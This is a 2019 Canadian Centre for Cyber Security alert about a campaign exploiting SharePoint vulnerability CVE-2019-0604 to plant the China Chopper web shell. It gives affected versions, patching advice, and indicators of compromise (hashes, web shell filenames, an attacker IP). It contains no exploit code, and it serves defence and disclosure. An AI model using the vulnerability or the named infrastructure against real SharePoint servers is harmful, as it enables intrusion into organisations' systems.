Alert - China Chopper Malware affecting SharePoint Servers

Number: AL19-006
Date: 23 April 2019

Audience

This Alert is intended for IT professionals and managers of notified organizations. Recipients of this information may only redistribute it within their respective organizations.

Purpose

An Alert is used to raise awareness of a recently identified cyber threat that may impact cyber information assets, and to provide additional detection and mitigation advice to recipients. The Canadian Centre for Cyber Security ("Cyber Centre") is also available to provide additional assistance regarding the content of this Alert to recipients as requested.

Assessment

The Cyber Centre is aware of a campaign that is currently compromising several versions of Microsoft SharePoint Server in order to deploy the China Chopper web shell. Trusted researchers have identified compromised systems belonging to the academic, utility, heavy industry, manufacturing and technology sectors. The following versions of Microsoft SharePoint are known to be affected:

  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Foundation 2013 SP1
  • Microsoft SharePoint Server 2010 SP2
  • Microsoft SharePoint Server 2019

It is likely that the current campaign is leveraging CVE-2019-0604 in order to deploy the web shell. Microsoft released security updates addressing this vulnerability in February and March 2019; however, many systems remain outdated.

Suggested action

  • All Microsoft SharePoint Server installations should be patched with the latest security update, dated 12 March 2019, using Microsoft Update, the Microsoft Update Catalog or the Microsoft Download Center.
  • If a SharePoint instance serves strictly as an on-premises solution, ensure that the server has no exposure to the Internet.

Indicators of compromise

HASH Values

MD5 Hash: b814532d73c7e5ffd1a2533adc6cfcf8
SHA1 Hash: dc8e7b7de41cac9ded920c41b272c885e1aec279
SHA256 Hash: 05108ac3c3d708977f2d679bfa6d2eaf63b371e66428018a68efce4b6a45b4b4
Filename: pay.aspx

MD5 Hash: 708544104809ef2776ddc56e04d27ab1
SHA1 Hash: f0fb0f7553390f203669e53abc16b15e729e5c6f
SHA256 Hash: b560c3b9b672f42a005bdeae79eb91dfb0dec8dc04bea51f38731692bc995688

MD5 Hash: 0eebeef32a8f676a1717f134f114c8bd
SHA1 Hash: 4c3b262b4134366ad0a67b1a2d6378da428d712b
SHA256 Hash: 7d6812947e7eafa8a4cce84b531f8077f7434dbed4ccdaca64225d1b6a0e8604
Filename: stylecss.aspx

IP Address

114.25.219.100

References

Microsoft advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604

ZDI article: https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability

Chine Chopper information: https://cyber.gc.ca/en/guidance/web-shells-china-chopper

Note to readers

The Canadian Centre for Cyber Security (Cyber Centre) operates as part of the Communications Security Establishment. We are Canada's national authority on cyber security and we lead the government's response to cyber security events. As Canada's national computer security incident response team, the Cyber Centre works in close collaboration with government departments, critical infrastructure, Canadian businesses and international partners to prepare for, respond to, mitigate, and recover from cyber events. We do this by providing authoritative advice and support, and coordinating information sharing and incident response. The Cyber Centre is outward-facing, welcoming partnerships that help build a stronger, more resilient cyber space in Canada.

Date modified: